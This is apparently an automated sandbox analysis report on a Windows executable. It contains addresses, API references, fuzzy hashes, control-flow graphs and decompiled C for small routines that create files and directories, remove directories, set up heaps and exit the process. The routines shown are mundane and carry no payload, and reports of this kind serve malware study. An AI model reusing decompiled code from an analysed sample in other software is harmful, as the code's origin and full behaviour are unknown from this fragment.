                                                                                                                                                              0x00401b71
                                                                                                                                                              0x00401b74
                                                                                                                                                              0x00401b79
                                                                                                                                                              0x00401b7f
                                                                                                                                                              0x00401b85
                                                                                                                                                              0x00401ba4
                                                                                                                                                              0x00401ba4
                                                                                                                                                              0x004017b6
                                                                                                                                                              0x004017b6
                                                                                                                                                              0x004017bb
                                                                                                                                                              0x004017c2
                                                                                                                                                              0x004017c7
                                                                                                                                                              0x004017cd
                                                                                                                                                              0x004017e0
                                                                                                                                                              0x004017e5
                                                                                                                                                              0x004017e6
                                                                                                                                                              0x004017e7
                                                                                                                                                              0x004017ed
                                                                                                                                                              0x004017f3
                                                                                                                                                              0x004017f9
                                                                                                                                                              0x004017fe
                                                                                                                                                              0x00401812
                                                                                                                                                              0x00401812
                                                                                                                                                              0x00401812
                                                                                                                                                              0x00401800
                                                                                                                                                              0x00401800
                                                                                                                                                              0x00401806
                                                                                                                                                              0x00401809
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040180b
                                                                                                                                                              0x0040180b
                                                                                                                                                              0x0040180b
                                                                                                                                                              0x00401809
                                                                                                                                                              0x00401814
                                                                                                                                                              0x00401816
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0040181c
                                                                                                                                                              0x0040181c
                                                                                                                                                              0x00401823
                                                                                                                                                              0x0040182a
                                                                                                                                                              0x0040182f
                                                                                                                                                              0x0040183b
                                                                                                                                                              0x00401841
                                                                                                                                                              0x00401845
                                                                                                                                                              0x00401850
                                                                                                                                                              0x00401851
                                                                                                                                                              0x00401856
                                                                                                                                                              0x0040185c
                                                                                                                                                              0x0040185c
                                                                                                                                                              0x0040185e
                                                                                                                                                              0x00401863
                                                                                                                                                              0x004019c6
                                                                                                                                                              0x004019c6
                                                                                                                                                              0x004019cd
                                                                                                                                                              0x004019da
                                                                                                                                                              0x004019df
                                                                                                                                                              0x004019e5
                                                                                                                                                              0x004019eb
                                                                                                                                                              0x004019ee
                                                                                                                                                              0x004019f3
                                                                                                                                                              0x004019f9
                                                                                                                                                              0x004019ff
                                                                                                                                                              0x00401a02
                                                                                                                                                              0x00401a07
                                                                                                                                                              0x00401a0d
                                                                                                                                                              0x00401a13
                                                                                                                                                              0x00401ba4
                                                                                                                                                              0x00401869
                                                                                                                                                              0x00401869
                                                                                                                                                              0x0040186f
                                                                                                                                                              0x00401875
                                                                                                                                                              0x00401880
                                                                                                                                                              0x00401881
                                                                                                                                                              0x00401886
                                                                                                                                                              0x0040188c
                                                                                                                                                              0x0040188c
                                                                                                                                                              0x0040188e
                                                                                                                                                              0x00401893
                                                                                                                                                              0x00401895
                                                                                                                                                              0x0040189b
                                                                                                                                                              0x0040189b
                                                                                                                                                              0x004018b0
                                                                                                                                                              0x004018b2
                                                                                                                                                              0x00401998
                                                                                                                                                              0x00401998
                                                                                                                                                              0x004019a8
                                                                                                                                                              0x004019aa
                                                                                                                                                              0x004019b7
                                                                                                                                                              0x004019c1
                                                                                                                                                              0x004019c1
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004018b8
                                                                                                                                                              0x004018bd
                                                                                                                                                              0x004018c2
                                                                                                                                                              0x004018cd
                                                                                                                                                              0x004018d9
                                                                                                                                                              0x004018e3
                                                                                                                                                              0x004018e8
                                                                                                                                                              0x004018ee
                                                                                                                                                              0x004018f8
                                                                                                                                                              0x004018fd
                                                                                                                                                              0x00401903
                                                                                                                                                              0x00401908
                                                                                                                                                              0x00401914
                                                                                                                                                              0x0040191a
                                                                                                                                                              0x0040191e
                                                                                                                                                              0x00401923
                                                                                                                                                              0x00401929
                                                                                                                                                              0x0040192e
                                                                                                                                                              0x00401934
                                                                                                                                                              0x00401937
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00401939
                                                                                                                                                              0x00401939
                                                                                                                                                              0x00401940
                                                                                                                                                              0x0040194d
                                                                                                                                                              0x00401952
                                                                                                                                                              0x00401958
                                                                                                                                                              0x0040195e
                                                                                                                                                              0x00401961
                                                                                                                                                              0x00401966
                                                                                                                                                              0x0040196c
                                                                                                                                                              0x00401972
                                                                                                                                                              0x00401975
                                                                                                                                                              0x0040197a
                                                                                                                                                              0x00401980
                                                                                                                                                              0x00401986
                                                                                                                                                              0x00401ba4
                                                                                                                                                              0x00401ba4
                                                                                                                                                              0x00401937
                                                                                                                                                              0x004018b2
                                                                                                                                                              0x00401863
                                                                                                                                                              0x00401816
                                                                                                                                                              0x004016cf
                                                                                                                                                              0x004016cf
                                                                                                                                                              0x004016e0
                                                                                                                                                              0x004016e5
                                                                                                                                                              0x004016eb
                                                                                                                                                              0x00401ba4
                                                                                                                                                              0x00401ba4
                                                                                                                                                              0x004016cd
                                                                                                                                                              0x004015fa
                                                                                                                                                              0x00401ba4
                                                                                                                                                              0x00401baf
                                                                                                                                                              0x00401bb4
                                                                                                                                                              0x00401bb9
                                                                                                                                                              0x00401bc3
                                                                                                                                                              0x00401bc8
                                                                                                                                                              0x00401bcd
                                                                                                                                                              0x00401bdc
                                                                                                                                                              0x00401bdc
                                                                                                                                                              0x004015c5
                                                                                                                                                              0x004015cb
                                                                                                                                                              0x00401ba4
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              • _rmdir.MSVCRT ref: 004015CB
                                                                                                                                                              • _rmdir.MSVCRT ref: 004016EB
                                                                                                                                                              • ExitProcess.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BA4
                                                                                                                                                              • HeapDestroy.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BAF
                                                                                                                                                              • ExitProcess.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BB4
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.477473854.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.477246614.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.478402728.0000000000409000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479113245.000000000040E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479422974.000000000040F000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_302746537.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ExitProcess_rmdir$DestroyHeap
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2349447675-0
                                                                                                                                                              • Opcode ID: 7ff438dc2005f445c1573f8959bcff76347286a518e84f97cfc343a5507eee76
                                                                                                                                                              • Instruction ID: f6203454605ce15a78fc4500694886718a1945bc82ad3b924abf98fa16e55a6a
                                                                                                                                                              • Opcode Fuzzy Hash: 7ff438dc2005f445c1573f8959bcff76347286a518e84f97cfc343a5507eee76
                                                                                                                                                              • Instruction Fuzzy Hash: B0E01A71114110D5D9407BB3AD83A5E392C9F4831DF50847FF242781F39A7E5655257F
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 559 401b95-401bb4 FreeLibrary ExitProcess HeapDestroy ExitProcess
                                                                                                                                                              C-Code - Quality: 35%
                                                                                                                                                              			E00401B95(void* __eax, void* __ecx) {
                                                                                                                                                              				void* _t12;
                                                                                                                                                              
                                                                                                                                                              				_t12 = __ecx;
                                                                                                                                                              				FreeLibrary(??);
                                                                                                                                                              				_push(0);
                                                                                                                                                              				ExitProcess();
                                                                                                                                                              				HeapDestroy( *0x40b0f8); // executed
                                                                                                                                                              				ExitProcess(??); // executed
                                                                                                                                                              				E00403B0B();
                                                                                                                                                              				E00403DB0(E00403CC0());
                                                                                                                                                              				E00404150();
                                                                                                                                                              				E00404A13(_t12);
                                                                                                                                                              				return E0040681C(E00406030());
                                                                                                                                                              			}




                                                                                                                                                              0x00401b95
                                                                                                                                                              0x00401b9a
                                                                                                                                                              0x00401b9f
                                                                                                                                                              0x00401ba4
                                                                                                                                                              0x00401baf
                                                                                                                                                              0x00401bb4
                                                                                                                                                              0x00401bb9
                                                                                                                                                              0x00401bc3
                                                                                                                                                              0x00401bc8
                                                                                                                                                              0x00401bcd
                                                                                                                                                              0x00401bdc

                                                                                                                                                              APIs
                                                                                                                                                              • FreeLibrary.KERNEL32 ref: 00401B9A
                                                                                                                                                              • ExitProcess.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BA4
                                                                                                                                                              • HeapDestroy.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BAF
                                                                                                                                                              • ExitProcess.KERNEL32(00000001,00000010,OPS,00000000,00000000,00000000), ref: 00401BB4
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.477473854.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.477246614.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.478402728.0000000000409000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479113245.000000000040E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479422974.000000000040F000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_302746537.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ExitProcess$DestroyFreeHeapLibrary
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2053948195-0
                                                                                                                                                              • Opcode ID: 5d7a21f33115fc00b4ce899fd08eef21c097241319e4cbf2c865bc4fb831db85
                                                                                                                                                              • Instruction ID: 8df1d9b4a75efc814e8b2774fb98a4c810adc8e8576d79e7d4d7b84f580b8b4c
                                                                                                                                                              • Opcode Fuzzy Hash: 5d7a21f33115fc00b4ce899fd08eef21c097241319e4cbf2c865bc4fb831db85
                                                                                                                                                              • Instruction Fuzzy Hash: 85D092701A051184D9407BF35803A4D2C1C4F8870EB4180BFB651381E38E3C4314157F
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 562 406170-4061ab call 40662c CreateFileA 565 4061c6-4061c8 562->565 566 4061ad-4061c4 CreateFileA 562->566 567 406211-406216 565->567 568 4061ca-4061fd RtlAllocateHeap 565->568 566->565 566->567 571 406224-40622a 567->571 572 406218-40621f call 4066bb 567->572 569 406208-40620e 568->569 570 4061ff-406205 568->570 572->571
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00406170(void* __eflags, intOrPtr _a4) {
                                                                                                                                                              				CHAR* _v0;
                                                                                                                                                              				intOrPtr _v4;
                                                                                                                                                              				void** _t10;
                                                                                                                                                              				void* _t11;
                                                                                                                                                              				intOrPtr _t13;
                                                                                                                                                              				CHAR* _t19;
                                                                                                                                                              				intOrPtr _t20;
                                                                                                                                                              				void* _t21;
                                                                                                                                                              				void* _t22;
                                                                                                                                                              				void** _t23;
                                                                                                                                                              
                                                                                                                                                              				_t20 =  *0x40b43c; // 0x21405a8
                                                                                                                                                              				_t10 = E0040662C(_t20, _a4);
                                                                                                                                                              				_t19 = _v0;
                                                                                                                                                              				_t23 = _t10; // executed
                                                                                                                                                              				_t11 = CreateFileA(_t19, 0xc0000000, 1, 0, 2, 0x80, 0); // executed
                                                                                                                                                              				_t22 = _t11;
                                                                                                                                                              				if(_t22 != 0xffffffff) {
                                                                                                                                                              					L2:
                                                                                                                                                              					if(_t22 == 0) {
                                                                                                                                                              						goto L6;
                                                                                                                                                              					} else {
                                                                                                                                                              						 *_t23 = _t22;
                                                                                                                                                              						_t21 =  *0x40b0f8; // 0x2140000
                                                                                                                                                              						_t23[1] = RtlAllocateHeap(_t21, 0, 0x1000);
                                                                                                                                                              						_t23[2] = 0x1000;
                                                                                                                                                              						_t23[3] = 0;
                                                                                                                                                              						_t23[5] = 1;
                                                                                                                                                              						if(_v4 != 0xffffffff) {
                                                                                                                                                              							return _t22;
                                                                                                                                                              						} else {
                                                                                                                                                              							return _t23;
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              				} else {
                                                                                                                                                              					_t22 = CreateFileA(_t19, 0x40000000, 1, 0, 5, 0, 0);
                                                                                                                                                              					if(_t22 == 0xffffffff) {
                                                                                                                                                              						L6:
                                                                                                                                                              						if(_a4 == 0xffffffff) {
                                                                                                                                                              							_t13 =  *0x40b43c; // 0x21405a8
                                                                                                                                                              							E004066BB(_t13, _t23);
                                                                                                                                                              						}
                                                                                                                                                              						return 0;
                                                                                                                                                              					} else {
                                                                                                                                                              						goto L2;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              			}













                                                                                                                                                              0x00406174
                                                                                                                                                              0x00406180
                                                                                                                                                              0x00406185
                                                                                                                                                              0x004061a2
                                                                                                                                                              0x004061a4
                                                                                                                                                              0x004061a6
                                                                                                                                                              0x004061ab
                                                                                                                                                              0x004061c6
                                                                                                                                                              0x004061c8
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004061ca
                                                                                                                                                              0x004061cf
                                                                                                                                                              0x004061d1
                                                                                                                                                              0x004061e5
                                                                                                                                                              0x004061e8
                                                                                                                                                              0x004061ef
                                                                                                                                                              0x004061f6
                                                                                                                                                              0x004061fd
                                                                                                                                                              0x0040620e
                                                                                                                                                              0x00406200
                                                                                                                                                              0x00406205
                                                                                                                                                              0x00406205
                                                                                                                                                              0x004061fd
                                                                                                                                                              0x004061ad
                                                                                                                                                              0x004061bf
                                                                                                                                                              0x004061c4
                                                                                                                                                              0x00406211
                                                                                                                                                              0x00406216
                                                                                                                                                              0x00406218
                                                                                                                                                              0x0040621f
                                                                                                                                                              0x0040621f
                                                                                                                                                              0x0040622a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x004061c4

                                                                                                                                                              APIs
                                                                                                                                                              • CreateFileA.KERNELBASE(00000000,C0000000,00000001,00000000,00000002,00000080,00000000,021405A8,00000000,?,?,?,00000000,00401A67,00000001,00000000), ref: 004061A4
                                                                                                                                                              • CreateFileA.KERNEL32(00000000,40000000,00000001,00000000,00000005,00000000,00000000,?,?,?,00000000,00401A67,00000001,00000000,00000000,0040A0C8), ref: 004061BD
                                                                                                                                                              • RtlAllocateHeap.NTDLL(02140000,00000000,00001000), ref: 004061DA
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.477473854.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.477246614.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.478402728.0000000000409000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479113245.000000000040E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479422974.000000000040F000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_302746537.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateFile$AllocateHeap
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2813278966-0
                                                                                                                                                              • Opcode ID: 37aa71c942510c7026b4bd5c517740329cdb7b4c424b667147bc97f85931557e
                                                                                                                                                              • Instruction ID: cfaef28ad908b1f0d4b3848689bff36785735015fc1d85a617d71e6b06036d25
                                                                                                                                                              • Opcode Fuzzy Hash: 37aa71c942510c7026b4bd5c517740329cdb7b4c424b667147bc97f85931557e
                                                                                                                                                              • Instruction Fuzzy Hash: C911B67234030066D230AB69AD49F57B798D790B71F11872AF3A1BB2D1C7B6A8548768
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 574 405f13-405f20 575 405f22-405f50 strncpy strlen 574->575 576 405f86 574->576 577 405f68-405f70 575->577 578 405f88-405f89 576->578 579 405f52-405f5a 577->579 580 405f72-405f84 CreateDirectoryA 577->580 581 405f66 579->581 582 405f5c-405f5f 579->582 580->578 581->577 582->581 583 405f61-405f64 582->583 583->580 583->581
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00405F13(char* _a4) {
                                                                                                                                                              				char _v8;
                                                                                                                                                              				char _v268;
                                                                                                                                                              				char* _t16;
                                                                                                                                                              				int _t18;
                                                                                                                                                              				char* _t20;
                                                                                                                                                              				char _t21;
                                                                                                                                                              				void* _t22;
                                                                                                                                                              
                                                                                                                                                              				if(_a4 == 0) {
                                                                                                                                                              					return 0;
                                                                                                                                                              				}
                                                                                                                                                              				strncpy( &_v268, _a4, 0x104);
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				_t16 = _t22 + strlen( &_v268) - 0x108;
                                                                                                                                                              				while(_t16 >  &_v268) {
                                                                                                                                                              					_t20 = _t16 - 1;
                                                                                                                                                              					_t21 =  *_t20;
                                                                                                                                                              					if(_t21 == 0x20 || _t21 == 0x5c || _t21 == 0x2f) {
                                                                                                                                                              						_t16 = _t20;
                                                                                                                                                              						continue;
                                                                                                                                                              					} else {
                                                                                                                                                              						break;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				 *_t16 = 0;
                                                                                                                                                              				_t18 = CreateDirectoryA( &_v268, 0); // executed
                                                                                                                                                              				return _t18;
                                                                                                                                                              			}










                                                                                                                                                              0x00405f20
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405f86
                                                                                                                                                              0x00405f31
                                                                                                                                                              0x00405f3d
                                                                                                                                                              0x00405f49
                                                                                                                                                              0x00405f68
                                                                                                                                                              0x00405f52
                                                                                                                                                              0x00405f55
                                                                                                                                                              0x00405f5a
                                                                                                                                                              0x00405f66
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00405f5a
                                                                                                                                                              0x00405f72
                                                                                                                                                              0x00405f7e
                                                                                                                                                              0x00000000

                                                                                                                                                              APIs
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.477473854.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.477246614.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.478402728.0000000000409000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479113245.000000000040E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479422974.000000000040F000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_302746537.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateDirectorystrlenstrncpy
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2535372781-0
                                                                                                                                                              • Opcode ID: 8001b25660f552bfb8bc346aeba8b70798e5ff3e20decd252b64886d137bc1f8
                                                                                                                                                              • Instruction ID: e2a7ac9b00687a60ad497853f81a50efedb75a5df88c79b9acbfe651115fb43f
                                                                                                                                                              • Opcode Fuzzy Hash: 8001b25660f552bfb8bc346aeba8b70798e5ff3e20decd252b64886d137bc1f8
                                                                                                                                                              • Instruction Fuzzy Hash: 0401F9319086099EDB21DA24CC89BEB77B99B10344F5400B6E5C4E61D1DBBC9AC8CF1A
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 584 4066f1-406737 RtlAllocateHeap * 2
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E004066F1(signed int _a4) {
                                                                                                                                                              				signed int _v0;
                                                                                                                                                              				signed int _v4;
                                                                                                                                                              				signed int _t11;
                                                                                                                                                              				void* _t13;
                                                                                                                                                              				signed int _t16;
                                                                                                                                                              				signed int* _t18;
                                                                                                                                                              
                                                                                                                                                              				_t18 = RtlAllocateHeap( *0x40b0f8, 8, 0x20);
                                                                                                                                                              				_t11 = _v4;
                                                                                                                                                              				_t18[3] = _t18[3] & 0x00000000;
                                                                                                                                                              				_t18[4] = _a4;
                                                                                                                                                              				_t16 = _v0;
                                                                                                                                                              				 *_t18 = _t11;
                                                                                                                                                              				_t18[1] = _t16;
                                                                                                                                                              				_t18[2] = _t16;
                                                                                                                                                              				_t13 = RtlAllocateHeap( *0x40b0f8, 8, _t11 * _t16); // executed
                                                                                                                                                              				_t18[7] = _t13;
                                                                                                                                                              				return _t18;
                                                                                                                                                              			}









                                                                                                                                                              0x00406709
                                                                                                                                                              0x0040670b
                                                                                                                                                              0x0040670f
                                                                                                                                                              0x00406713
                                                                                                                                                              0x00406716
                                                                                                                                                              0x0040671a
                                                                                                                                                              0x00406722
                                                                                                                                                              0x00406725
                                                                                                                                                              0x0040672e
                                                                                                                                                              0x00406730
                                                                                                                                                              0x00406737

                                                                                                                                                              APIs
                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000008,00000020), ref: 00406703
                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000008,?), ref: 0040672E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.477473854.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.477246614.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.478402728.0000000000409000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479113245.000000000040E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479422974.000000000040F000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_302746537.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                              • Opcode ID: 8949d9c54749204bb44548e3168ae262ece6588501e9efe4df11175648cca151
                                                                                                                                                              • Instruction ID: 97085aaf5d90ff1175411855662eb62e74a246e0554bdcf5be02ff30625659a3
                                                                                                                                                              • Opcode Fuzzy Hash: 8949d9c54749204bb44548e3168ae262ece6588501e9efe4df11175648cca151
                                                                                                                                                              • Instruction Fuzzy Hash: 6CF0F871244701DFD324CF1ADD01B1AFBE8FB94710F01C82EE0A9976A0D7B0A8058F94
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 585 407470-4074b6 HeapCreate RtlAllocateHeap
                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E00407470() {
                                                                                                                                                              				void* _t1;
                                                                                                                                                              				long _t2;
                                                                                                                                                              				void* _t3;
                                                                                                                                                              				void* _t4;
                                                                                                                                                              
                                                                                                                                                              				_t1 = HeapCreate(1, 0x1000, 0); // executed
                                                                                                                                                              				 *0x40b3b4 = _t1;
                                                                                                                                                              				 *0x40b3b0 = 0;
                                                                                                                                                              				 *0x40b444 = 0x10;
                                                                                                                                                              				_t2 =  *0x40b444; // 0x4104
                                                                                                                                                              				_t4 =  *0x40b3b4; // 0x2260000
                                                                                                                                                              				_t3 = RtlAllocateHeap(_t4, 1, _t2);
                                                                                                                                                              				 *0x40a390 = _t3;
                                                                                                                                                              				return _t3;
                                                                                                                                                              			}







                                                                                                                                                              0x0040747c
                                                                                                                                                              0x00407482
                                                                                                                                                              0x00407487
                                                                                                                                                              0x00407491
                                                                                                                                                              0x0040749b
                                                                                                                                                              0x004074a3
                                                                                                                                                              0x004074aa
                                                                                                                                                              0x004074b0
                                                                                                                                                              0x004074b6

                                                                                                                                                              APIs
                                                                                                                                                              • HeapCreate.KERNELBASE(00000001,00001000,00000000), ref: 0040747C
                                                                                                                                                              • RtlAllocateHeap.NTDLL(02260000,00000001,00004104), ref: 004074AA
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.477473854.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.477246614.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.478402728.0000000000409000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479113245.000000000040E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479422974.000000000040F000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_302746537.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Heap$AllocateCreate
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2875408731-0
                                                                                                                                                              • Opcode ID: 1264e4af3161c54cd60dd595cb6146aa1e96e8ebed9f3996878882c22747d97a
                                                                                                                                                              • Instruction ID: edee8b013b50a9eb835c02f3e92a01e020b9c77627f8564c048df27c577a0994
                                                                                                                                                              • Opcode Fuzzy Hash: 1264e4af3161c54cd60dd595cb6146aa1e96e8ebed9f3996878882c22747d97a
                                                                                                                                                              • Instruction Fuzzy Hash: 25E0B670144304AFE314CF50EF05F563BA8F304744F100429FA48AA3AAC7F264508B9E
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 586 403694-4036a1 7048DB20 CoInitialize
                                                                                                                                                              C-Code - Quality: 37%
                                                                                                                                                              			E00403694() {
                                                                                                                                                              				void* _t1;
                                                                                                                                                              
                                                                                                                                                              				L00407E14();
                                                                                                                                                              				_t1 =  *0x40a870(0); // executed
                                                                                                                                                              				return _t1;
                                                                                                                                                              			}




                                                                                                                                                              0x00403694
                                                                                                                                                              0x0040369b
                                                                                                                                                              0x004036a1

                                                                                                                                                              APIs
                                                                                                                                                              • 7048DB20.COMCTL32(0040106C,00000000,00001000,00000000,00000000), ref: 00403694
                                                                                                                                                              • CoInitialize.OLE32(00000000), ref: 0040369B
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 0000000F.00000002.477473854.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                              • Associated: 0000000F.00000002.477246614.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.478402728.0000000000409000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479113245.000000000040E000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              • Associated: 0000000F.00000002.479422974.000000000040F000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_15_2_400000_302746537.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: 7048Initialize
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3917830298-0
                                                                                                                                                              • Opcode ID: 495e8d337ab532213a8553dd48cd182140a6b03d5bc003c5ec6fc0d6657f4cde
                                                                                                                                                              • Instruction ID: e54652b8d3c1eea1b95337253ed1730e4f0a5e5d42e685e6d2013b240332fa4d
                                                                                                                                                              • Opcode Fuzzy Hash: 495e8d337ab532213a8553dd48cd182140a6b03d5bc003c5ec6fc0d6657f4cde
                                                                                                                                                              • Instruction Fuzzy Hash: 19A0023194924056DD4077729A0BB0D3570678174AF1044E9B105751D24974982285AB
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              C-Code - Quality: 76%
                                                                                                                                                              			E00401BDD(void* __eflags, intOrPtr _a4) {
                                                                                                                                                              				intOrPtr _v8;
                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                              				CHAR* _v20;
                                                                                                                                                              				CHAR* _v24;
                                                                                                                                                              				intOrPtr _v28;
                                                                                                                                                              				intOrPtr _t15;
                                                                                                                                                              				intOrPtr _t19;
                                                                                                                                                              				intOrPtr _t25;
                                                                                                                                                              				void* _t60;
                                                                                                                                                              				void* _t61;
